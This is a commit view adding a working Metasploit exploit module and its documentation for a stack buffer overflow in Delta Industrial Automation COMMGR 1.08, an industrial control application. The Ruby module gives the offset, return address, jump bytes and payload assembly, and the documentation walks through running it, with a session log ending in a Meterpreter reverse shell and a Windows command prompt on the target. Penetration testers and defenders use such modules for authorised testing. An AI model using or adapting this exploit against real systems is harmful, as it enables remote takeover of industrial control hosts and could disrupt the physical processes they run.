Added exploit module for Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow
parent
5b6938e942
commit
9ae17daf46
|
@ -0,0 +1,67 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install Delta Industrial Automation COMMGR 1.08
|
||||||
|
2. Start `msfconsole`
|
||||||
|
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
|
||||||
|
4. Do ```set RHOST <target_ip>```
|
||||||
|
5. Do ```run```
|
||||||
|
6. You should get a shell. :)
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/windows/scada/delta_ia_commgr_bof
|
||||||
|
msf exploit(windows/scada/delta_ia_commgr_bof) > show options
|
||||||
|
|
||||||
|
Module options (exploit/windows/scada/delta_ia_commgr_bof):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
RHOST yes The target address
|
||||||
|
RPORT 502 yes The target port (TCP)
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 COMMGR 1.08 / Windows Universal
|
||||||
|
|
||||||
|
|
||||||
|
msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
|
||||||
|
RHOST => 192.168.3.64
|
||||||
|
msf exploit(windows/scada/delta_ia_commgr_bof) > run
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.3.150:4444
|
||||||
|
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
|
||||||
|
[*] Sending stage (179779 bytes) to 192.168.3.64
|
||||||
|
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : TEST01
|
||||||
|
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||||
|
Architecture : x64
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 2
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
meterpreter > shell
|
||||||
|
Process 932 created.
|
||||||
|
Channel 1 created.
|
||||||
|
Microsoft Windows [Version 6.1.7601]
|
||||||
|
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||||
|
|
||||||
|
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
|
||||||
|
exit
|
||||||
|
meterpreter > exit
|
||||||
|
[*] Shutting down Meterpreter...
|
||||||
|
|
||||||
|
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
|
||||||
|
msf exploit(windows/scada/delta_ia_commgr_bof) >
|
||||||
|
```
|
|
@ -0,0 +1,75 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = NormalRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
|
||||||
|
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
|
||||||
|
crafted packets. This module has been tested successfully on Delta Electronics Delta
|
||||||
|
Industrial Automation COMMGR 1.08 over
|
||||||
|
Windows XP SP3,
|
||||||
|
Windows 7 SP1, and
|
||||||
|
Windows 8.1.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
't4rkd3vilz', # PoC
|
||||||
|
'hubertwslin' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'EDB', '44965'],
|
||||||
|
[ 'CVE', '2018-10594']
|
||||||
|
],
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 640,
|
||||||
|
'DisableNops' => true,
|
||||||
|
'BadChars' => "\x00"
|
||||||
|
},
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'thread',
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'COMMGR 1.08 / Windows Universal',
|
||||||
|
{
|
||||||
|
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
|
||||||
|
'Offset' => 4164
|
||||||
|
}
|
||||||
|
],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Jul 02 2018',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(502)
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
data = rand_text_alpha(target['Offset'])
|
||||||
|
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
|
||||||
|
data << [target.ret].pack("V")
|
||||||
|
data << make_nops(40)
|
||||||
|
data << payload.encoded
|
||||||
|
|
||||||
|
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
|
||||||
|
connect
|
||||||
|
sock.put(data)
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
Loading…
Reference in New Issue